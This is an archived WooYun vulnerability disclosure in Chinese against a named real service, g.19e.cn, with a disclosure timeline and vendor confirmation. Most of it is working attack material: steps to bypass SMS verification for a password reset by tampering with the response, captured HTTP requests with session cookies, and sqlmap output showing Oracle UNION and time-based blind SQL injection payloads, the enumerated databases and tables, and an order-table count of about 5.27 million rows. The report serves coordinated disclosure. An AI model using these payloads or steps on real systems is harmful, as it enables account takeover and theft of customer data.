乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-14: 细节已通知厂商并且等待厂商处理中 2016-05-16: 厂商已经确认,细节仅向厂商公开 2016-05-26: 细节向核心白帽子及相关领域专家公开 2016-06-05: 细节向普通白帽子公开 2016-06-15: 细节向实习白帽子公开 2016-06-30: 细节向公众公开
扫某网站C段的时候,发现了这个平台,然后测试了一波,目测问题还有一堆
http://g.19e.cn/login/index.jsp#手机号遍历
获取短信验证码时抓包
#密码重置输入用户名lijing,验证码随便输入,抓包
POST /smsAction_validateShortMessage.do?mobileNum=15516777178&dxyzm=1234 HTTP/1.1Host: g.19e.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestReferer: http://g.19e.cn/zhmm/zhmm_index.jspCookie: SSOID=A0E6616917B86A70FBCA454845FC375D-n1; SSAID=2836F7AAEF7DCC4ED40D98F486CE0CD0-n3; JSESSIONID=jWY41CQuJZRZ9rhnY3zG.199X-Forwarded-For: 8.8.8.8'Connection: closeContent-Length: 0
将返回的包改为0
lijing/wooyun
#SQL注入注入点在账户名称和员工姓名处
POST /account_queryList.do HTTP/1.1Host: g.19e.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://g.19e.cn/account_queryList.doCookie: SSOID=A0E6616917B86A70FBCA454845FC375D-n1; SSAID=2836F7AAEF7DCC4ED40D98F486CE0CD0-n3; JSESSIONID=yzH9LFXcgruwY7a9qcgE.199X-Forwarded-For: 8.8.8.8'Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 109addCount=20&account.accountName=DSD&account.realName=&temStatus=-1&account.startTime=&account.endTime=&flag=1
Place: POSTParameter: account.accountName Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: addCount=20&account.accountName=1%' UNION ALL SELECT NULL,NULL,CHR(58)||CHR(122)||CHR(98)||CHR(117)||CHR(58)||CHR(117)||CHR(75)||CHR(78)||CHR(122)||CHR(119)||CHR(72)||CHR(77)||CHR(106)||CHR(112)||CHR(79)||CHR(58)||CHR(100)||CHR(116)||CHR(112)||CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &account.realName=&temStatus=-1&account.startTime=&account.endTime=&flag=1 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: addCount=20&account.accountName=1%' AND 3610=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(120)||CHR(114)||CHR(81),5) AND '%'='&account.realName=&temStatus=-1&account.startTime=&account.endTime=&flag=1---back-end DBMS: Oracleavailable databases [7]:[*] CTXSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] STOCKWEB[*] SYS[*] SYSTEMDatabase: STOCKWEB[60 tables]+---------------------------+| BXY || GHC_BAK_20130801 || GHC_BAK_20130802 || GHC_BIH_STAT_INFO || GHC_BIH_STAT_RULE || GHC_CHANNEL_AUTO_DISCOUNT || GHC_CHANNEL_DISCOUNT || GHC_CHANNEL_INFO || GHC_CHANNEL_MAPPING || GHC_CHANNEL_SUPPORTCITY || GHC_CHANNEL_SUPPORTMONEY || GHC_CHANNEL_WARNINFO || GHC_CODE_CITY || GHC_CODE_PROVINCEINFO || GHC_MODIFY_CHANNEL_LOG || GHC_ORDER_COUNTERACT || GHC_ORDER_INFO || GHC_ORDER_INFO_CF201208 || GHC_ORDER_INFO_HIS || GHG_CHANNEL_DETAIL || GHG_CHANNEL_ERROR_INFO || GHG_CHARGEORDER || GHG_MANUAL_RECORDS || GHG_REQUEST || GHG_USERDETAIL || GHK_CITY || GHK_DISTRICT || GHK_LEVEL || GHK_LOWESTSALEPRICE || GHK_LOWESTSALEPRICE_RULE || GHK_MODIFYMONEY_REVIEW || GHK_ORDER_REVIEW || GHK_PRODUCT_TASK || GHK_PROVINCE || GHK_TRANSACTION_VOLUME || GHM_ACCOUNT || GHM_ADMIN || GHM_BAK_0811 || GHM_BAK_0812 || GHM_CHECKORDER || GHM_DELETEUSERS || GHM_DELETEUSERTEMP || GHM_LETTER || GHM_MENU || GHM_NOTICE || GHM_OPERATELOG || GHM_PHONE_VALIDATE || GHM_REVELSALREFUND || GHM_SAFESET || GHM_USERREADNOTICELOG || GHM_USERS || GHM_USERS_ALTERLOG || GHM_USER_MENU || GHM_WALLETINFO || GH_NTY_TEMPLATE || HF_ACCSEGMENT || MSG_SEND_DETAIL_INFO || MSG_SEND_MANAGER_INFO || TEST_1015 || T_USER |+---------------------------+
Database: STOCKWEB+----------------+---------+| Table | Entries |+----------------+---------+| GHC_ORDER_INFO | 5270414 |+----------------+---------+
求20rank
危害等级:高
漏洞Rank:13
确认时间:2016-05-16 14:23
确认漏洞确实存在,正在修复。
暂无